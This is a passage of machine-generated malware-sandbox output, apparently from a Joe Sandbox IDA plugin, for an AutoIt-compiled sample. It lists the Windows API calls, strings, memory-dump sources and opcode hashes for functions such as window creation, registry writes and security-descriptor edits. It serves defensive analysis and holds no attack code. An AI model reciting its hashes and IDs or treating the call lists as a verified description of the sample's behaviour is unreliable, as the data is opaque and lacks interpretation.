                           • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: _wcslen$MessageSend$BuffCharUpper
                          • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                          • API String ID: 1103490817-719923060
                          • Opcode ID: fd16477f69eba1fa51a982b03cdd04e2e518095cc1410c2b46471d76df2f3963
                          • Instruction ID: a2e0f307302b5f6fb1255b00180d06909838b4c2a5d395878edb3e09db30cb7a
                          • Opcode Fuzzy Hash: fd16477f69eba1fa51a982b03cdd04e2e518095cc1410c2b46471d76df2f3963
                          • Instruction Fuzzy Hash: E0E1B031218201CFCB14DF24D95592AB7E6BFC8714F144A6CF8969B3A1DB38ED45CB91
                          APIs
                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00718968
                          • GetSystemMetrics.USER32(00000007), ref: 00718970
                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0071899B
                          • GetSystemMetrics.USER32(00000008), ref: 007189A3
                          • GetSystemMetrics.USER32(00000004), ref: 007189C8
                          • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 007189E5
                          • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 007189F5
                          • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00718A28
                          • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00718A3C
                          • GetClientRect.USER32(00000000,000000FF), ref: 00718A5A
                          • GetStockObject.GDI32(00000011), ref: 00718A76
                          • SendMessageW.USER32(00000000,00000030,00000000), ref: 00718A81
                            • Part of subcall function 0071912D: GetCursorPos.USER32(?), ref: 00719141
                            • Part of subcall function 0071912D: ScreenToClient.USER32(00000000,?), ref: 0071915E
                            • Part of subcall function 0071912D: GetAsyncKeyState.USER32(00000001), ref: 00719183
                            • Part of subcall function 0071912D: GetAsyncKeyState.USER32(00000002), ref: 0071919D
                          • SetTimer.USER32(00000000,00000000,00000028,007190FC), ref: 00718AA8
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                           • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                          • String ID: AutoIt v3 GUI
                          • API String ID: 1458621304-248962490
                          • Opcode ID: 7c3c6abf7c6bf42f16c6aa7c49b6b6c83f7d874fb0ca51bca9d20746bc9edf54
                          • Instruction ID: 0019bf22b2e6ba8e09dcba57f74bd0a5c1511495fb56c1680de606944484b61b
                          • Opcode Fuzzy Hash: 7c3c6abf7c6bf42f16c6aa7c49b6b6c83f7d874fb0ca51bca9d20746bc9edf54
                          • Instruction Fuzzy Hash: 1CB18D71A00209AFDF14DFA8CC55BEA3BB4FB08315F51822AFA15A72D0DB78E841CB55
                          APIs
                            • Part of subcall function 007610F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00761114
                            • Part of subcall function 007610F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00760B9B,?,?,?), ref: 00761120
                            • Part of subcall function 007610F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00760B9B,?,?,?), ref: 0076112F
                            • Part of subcall function 007610F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00760B9B,?,?,?), ref: 00761136
                            • Part of subcall function 007610F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0076114D
                          • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00760DF5
                          • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00760E29
                          • GetLengthSid.ADVAPI32(?), ref: 00760E40
                          • GetAce.ADVAPI32(?,00000000,?), ref: 00760E7A
                          • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00760E96
                          • GetLengthSid.ADVAPI32(?), ref: 00760EAD
                          • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00760EB5
                          • HeapAlloc.KERNEL32(00000000), ref: 00760EBC
                          • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00760EDD
                          • CopySid.ADVAPI32(00000000), ref: 00760EE4
                          • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00760F13
                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00760F35
                          • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00760F47
                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00760F6E
                          • HeapFree.KERNEL32(00000000), ref: 00760F75
                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00760F7E
                          • HeapFree.KERNEL32(00000000), ref: 00760F85
                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00760F8E
                          • HeapFree.KERNEL32(00000000), ref: 00760F95
                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00760FA1
                          • HeapFree.KERNEL32(00000000), ref: 00760FA8
                            • Part of subcall function 00761193: GetProcessHeap.KERNEL32(00000008,00760BB1,?,00000000,?,00760BB1,?), ref: 007611A1
                            • Part of subcall function 00761193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00760BB1,?), ref: 007611A8
                            • Part of subcall function 00761193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00760BB1,?), ref: 007611B7
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                           • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                          • String ID:
                          • API String ID: 4175595110-0
                          • Opcode ID: b678c2c8c457473178ad3fba9cf49cdb00805e8d67545fe8161086398eba9c28
                          • Instruction ID: a8ed7d7ee560da03fd4de36791fac73efb8c462931dc84e36e290de7d85e7617
                          • Opcode Fuzzy Hash: b678c2c8c457473178ad3fba9cf49cdb00805e8d67545fe8161086398eba9c28
                          • Instruction Fuzzy Hash: 95715E7190021AEBDF219FA4DC49BEFBBB8BF05300F048115F91AA6251D7799A05CBA0
                          APIs
                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0078C4BD
                          • RegCreateKeyExW.ADVAPI32(?,?,00000000,0079CC08,00000000,?,00000000,?,?), ref: 0078C544
                          • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 0078C5A4
                          • _wcslen.LIBCMT ref: 0078C5F4
                          • _wcslen.LIBCMT ref: 0078C66F
                          • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 0078C6B2
                          • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 0078C7C1
                          • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 0078C84D
                          • RegCloseKey.ADVAPI32(?), ref: 0078C881
                          • RegCloseKey.ADVAPI32(00000000), ref: 0078C88E
                          • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 0078C960
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                           • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                          • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                          • API String ID: 9721498-966354055
                          • Opcode ID: 5736fcc757b87b41300e78da2d612cb79d0a729385c353589f317956ed828604
                          • Instruction ID: a410a64c5e5ec4b4fcbeb9dd438b271d479c536bba6b2c636029723bf0f6a943
                          • Opcode Fuzzy Hash: 5736fcc757b87b41300e78da2d612cb79d0a729385c353589f317956ed828604
                          • Instruction Fuzzy Hash: 33127931604201DFDB15EF14C895A2AB7E5EF88714F14899CF88A9B3A2DB39FD41CB91
                          APIs
                          • CharUpperBuffW.USER32(?,?), ref: 007909C6
                          • _wcslen.LIBCMT ref: 00790A01
                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00790A54
                          • _wcslen.LIBCMT ref: 00790A8A
                          • _wcslen.LIBCMT ref: 00790B06
                          • _wcslen.LIBCMT ref: 00790B81
                            • Part of subcall function 0071F9F2: _wcslen.LIBCMT ref: 0071F9FD
                            • Part of subcall function 00762BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00762BFA
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                           • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: _wcslen$MessageSend$BuffCharUpper
                          • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                          • API String ID: 1103490817-4258414348
                          • Opcode ID: 317e258e3d4b9168c958f5f1951c55718a85a64192b4461a1cab00d7c72ba81a
                          • Instruction ID: a7aeb6b57f085edb2333c4e7aa07370ec40556c8e38c13d86a17d903e1c66690
                          • Opcode Fuzzy Hash: 317e258e3d4b9168c958f5f1951c55718a85a64192b4461a1cab00d7c72ba81a
                          • Instruction Fuzzy Hash: DFE18A71218701DFCB14DF24D45496AB7E1FF98314B14895CF8969B3A2DB38ED85CB81
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                           • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: _wcslen$BuffCharUpper
                          • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                          • API String ID: 1256254125-909552448
                          • Opcode ID: d2b6a6e8476996ee04c285fb5e2e91c5a932ed4a659b5c6bc51b417df4e7e5e5
                          • Instruction ID: 7b817385b0111f706bf6c26118faddc82834ab6e5a862cc609ca775f4b1dffbe
                          • Opcode Fuzzy Hash: d2b6a6e8476996ee04c285fb5e2e91c5a932ed4a659b5c6bc51b417df4e7e5e5
                          • Instruction Fuzzy Hash: CF71293264052A8BCB16FE7CCC41ABB3791AB60750F144129F865A7284EA3DDD44C7B1
                          APIs
                          • _wcslen.LIBCMT ref: 0079835A
                          • _wcslen.LIBCMT ref: 0079836E
                          • _wcslen.LIBCMT ref: 00798391
                          • _wcslen.LIBCMT ref: 007983B4
                          • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 007983F2
                          • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00795BF2), ref: 0079844E
                          • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00798487
                          • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 007984CA
                          • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00798501
                          • FreeLibrary.KERNEL32(?), ref: 0079850D
                          • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0079851D
                          • DestroyIcon.USER32(?,?,?,?,?,00795BF2), ref: 0079852C
                          • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00798549
                          • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00798555
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                           • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                          • String ID: .dll$.exe$.icl
                          • API String ID: 799131459-1154884017
                          • Opcode ID: ac762597c810b013c061b0c43bbd7a0cf8fed07d4fe19243d017c82e92a05f8e
                          • Instruction ID: 377abc107c88cf23693651df3234777be255af48fe5491bd2569504681501686
                          • Opcode Fuzzy Hash: ac762597c810b013c061b0c43bbd7a0cf8fed07d4fe19243d017c82e92a05f8e
                          • Instruction Fuzzy Hash: 7761CF71540215FBEF14DF64EC45BBE77A8BF09721F10860AF815E61D1DB78AA90CBA0
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                           • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID:
                          • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                          • API String ID: 0-1645009161
                          • Opcode ID: c86d42d4b4323d1b4b220ee46e0dc4d0e31cf1d65c93341d27bfacda8a5e828d
                          • Instruction ID: 9639fc9b08111e2fd704a1d1e68f8fb2d6024a6e5ce2196a7932c69dfd093a8b
                          • Opcode Fuzzy Hash: c86d42d4b4323d1b4b220ee46e0dc4d0e31cf1d65c93341d27bfacda8a5e828d
                          • Instruction Fuzzy Hash: 288111B1A04205FBDF24AF60DC46FAE3BA8AF55340F044125F905AA1D2EB7DEA41C7A1
                          APIs
                          • LoadIconW.USER32(00000063), ref: 00765A2E
                          • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00765A40
                          • SetWindowTextW.USER32(?,?), ref: 00765A57
                          • GetDlgItem.USER32(?,000003EA), ref: 00765A6C
                          • SetWindowTextW.USER32(00000000,?), ref: 00765A72
                          • GetDlgItem.USER32(?,000003E9), ref: 00765A82
                          • SetWindowTextW.USER32(00000000,?), ref: 00765A88
                          • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00765AA9
                          • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00765AC3
                          • GetWindowRect.USER32(?,?), ref: 00765ACC
                          • _wcslen.LIBCMT ref: 00765B33
                          • SetWindowTextW.USER32(?,?), ref: 00765B6F
                          • GetDesktopWindow.USER32 ref: 00765B75
                          • GetWindowRect.USER32(00000000), ref: 00765B7C
                          • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00765BD3
                          • GetClientRect.USER32(?,?), ref: 00765BE0
                          • PostMessageW.USER32(?,00000005,00000000,?), ref: 00765C05
                          • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00765C2F
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                           • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                          • String ID:
                          • API String ID: 895679908-0
                          • Opcode ID: edb801e60024899aec1a5db56d25cf7943e4f89c5a689f0d392b5b4e63424c74
                          • Instruction ID: ec96d7c2ced9675beb9b0a9c41ade889ea83d658d497777402e26ecce7137790
                          • Opcode Fuzzy Hash: edb801e60024899aec1a5db56d25cf7943e4f89c5a689f0d392b5b4e63424c74
                          • Instruction Fuzzy Hash: A5718C71900B09EFDB21DFA8CE85AAEBBF5FF48704F104619E587A25A0D778E940DB14
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                           • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: _wcslen
                          • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT$[|
                          • API String ID: 176396367-3113052777
                          • Opcode ID: 87e760b1308066d65d37ad17bfc22f264a8ee3b80a61f4db2b209d0d86e63912
                          • Instruction ID: 6f308500ed5af7f417c5b6651c1a763610fddef929650520cbcc5cb668a59e29
                          • Opcode Fuzzy Hash: 87e760b1308066d65d37ad17bfc22f264a8ee3b80a61f4db2b209d0d86e63912
                          • Instruction Fuzzy Hash: 58E1A432A00526EBCB189F78C455BEDFBB4BF54710F54822DE857A7281DB38AE85C790
                          APIs
                          • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 007200C6
                            • Part of subcall function 007200ED: InitializeCriticalSectionAndSpinCount.KERNEL32(007D070C,00000FA0,0DF1096C,?,?,?,?,007423B3,000000FF), ref: 0072011C
                            • Part of subcall function 007200ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,007423B3,000000FF), ref: 00720127
                            • Part of subcall function 007200ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,007423B3,000000FF), ref: 00720138
                            • Part of subcall function 007200ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 0072014E
                            • Part of subcall function 007200ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 0072015C
                            • Part of subcall function 007200ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 0072016A
                            • Part of subcall function 007200ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00720195
                            • Part of subcall function 007200ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 007201A0
                          • ___scrt_fastfail.LIBCMT ref: 007200E7
                            • Part of subcall function 007200A3: __onexit.LIBCMT ref: 007200A9
                          Strings
                          • WakeAllConditionVariable, xrefs: 00720162
                          • kernel32.dll, xrefs: 00720133
                          • SleepConditionVariableCS, xrefs: 00720154
                          • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00720122
                          • InitializeConditionVariable, xrefs: 00720148
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                           • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                          • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                          • API String ID: 66158676-1714406822
                          • Opcode ID: ce1dcba0835ed685790824bc3a8466a711f15996167a65925311f29a47b71cb5
                          • Instruction ID: 3886bbd3b403c4c8c0cef0958bf1f4e31fb5346db007a98fa76b5f10f84d0388
                          • Opcode Fuzzy Hash: ce1dcba0835ed685790824bc3a8466a711f15996167a65925311f29a47b71cb5
                          • Instruction Fuzzy Hash: 4621F9B2645724ABEF115B74BC0AB6E33A4DB05B61F00412BF801E62D2DB7C98108AE8
                          APIs
                          • CharLowerBuffW.USER32(00000000,00000000,0079CC08), ref: 00774527
                          • _wcslen.LIBCMT ref: 0077453B
                          • _wcslen.LIBCMT ref: 00774599
                          • _wcslen.LIBCMT ref: 007745F4
                          • _wcslen.LIBCMT ref: 0077463F
                          • _wcslen.LIBCMT ref: 007746A7
                            • Part of subcall function 0071F9F2: _wcslen.LIBCMT ref: 0071F9FD
                          • GetDriveTypeW.KERNEL32(?,007C6BF0,00000061), ref: 00774743
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                           • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: _wcslen$BuffCharDriveLowerType
                          • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                          • API String ID: 2055661098-1000479233
                          • Opcode ID: 5ecd731d13e0f3426f538799edea8fec7f48d41f922276ffd51db36674426fae
                          • Instruction ID: d54de49e7fd6d2a6e3326a99ea7738f587d7b4892a7ed8f05afb05ceb46a1be6
                          • Opcode Fuzzy Hash: 5ecd731d13e0f3426f538799edea8fec7f48d41f922276ffd51db36674426fae
                          • Instruction Fuzzy Hash: 10B1F571608302DFCB14DF28C894A6AB7E5BF957A0F508A1DF49AC7291D738DD44CB92
                          APIs
                            • Part of subcall function 00719BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00719BB2
                          • DragQueryPoint.SHELL32(?,?), ref: 00799147
                            • Part of subcall function 00797674: ClientToScreen.USER32(?,?), ref: 0079769A
                            • Part of subcall function 00797674: GetWindowRect.USER32(?,?), ref: 00797710
                            • Part of subcall function 00797674: PtInRect.USER32(?,?,00798B89), ref: 00797720
                          • SendMessageW.USER32(?,000000B0,?,?), ref: 007991B0
                          • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 007991BB
                          • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 007991DE
                          • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00799225
                          • SendMessageW.USER32(?,000000B0,?,?), ref: 0079923E
                          • SendMessageW.USER32(?,000000B1,?,?), ref: 00799255
                          • SendMessageW.USER32(?,000000B1,?,?), ref: 00799277
                          • DragFinish.SHELL32(?), ref: 0079927E
                          • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00799371
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                           • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                          • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$p#}
                          • API String ID: 221274066-1593647580
                          • Opcode ID: 8c72b4027d75e292475058ac47ce84e2c0b81d3d60401f293165c658130949bc
                          • Instruction ID: 5423412cc82a2c5c772bbee2e3c424b456c80feaedfddfd82468a576110ec5e4
                          • Opcode Fuzzy Hash: 8c72b4027d75e292475058ac47ce84e2c0b81d3d60401f293165c658130949bc
                          • Instruction Fuzzy Hash: 85615D71108301EFD701DF64DC89DAFBBE8EF85750F404A1EF695921A1DB349A45CB62
                          APIs
                          • _wcslen.LIBCMT ref: 0078B198
                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0078B1B0
                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0078B1D4
                          • _wcslen.LIBCMT ref: 0078B200
                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0078B214
                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0078B236
                          • _wcslen.LIBCMT ref: 0078B332
